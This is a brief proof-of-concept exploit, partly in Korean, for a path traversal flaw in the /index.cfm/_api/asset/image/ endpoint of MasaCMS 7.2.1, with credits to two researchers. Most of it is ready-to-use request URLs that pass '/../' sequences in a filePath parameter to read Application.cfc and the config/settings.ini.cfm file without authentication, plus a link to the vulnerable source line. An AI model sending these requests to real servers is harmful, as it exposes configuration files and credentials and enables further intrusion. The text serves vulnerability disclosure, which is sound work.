
MasaCMS 7.2.1의 /index.cfm/_api/asset/image/ 경로 탐색에 대한 개념 증명 익스플로잇으로, 인증되지 않은 공격자가 config 및 Application.cfc와 같은 임의 파일을 읽을 수 있게 합니다.
MasaCMS 7.2.1은 /index.cfm/_api/asset/image/ 경로에서 발생하는 경로 탐색(path traversal) 취약점의 영향을 받습니다.
If this file is readable it means the vulnerability exists.
https://example.com/index.cfm/_api/asset/image/?filePath=/Application.cfc
https://example.com/index.cfm/_api/asset/image/?filePath=/../<Path>
- Read The Config File
https://example.com/index.cfm/_api/asset/image/?filePath=/../config/settings.ini.cfm
MasaCMS 7.2.1
https://github.com/MasaCMS/MasaCMS https://github.com/MasaCMS/MasaCMS/blob/01e0636db0ea4c132906724e1b0772c86e263ada/core/mura/content/file/fileManager.cfc#L368
Rawi 및 BassamAssiri.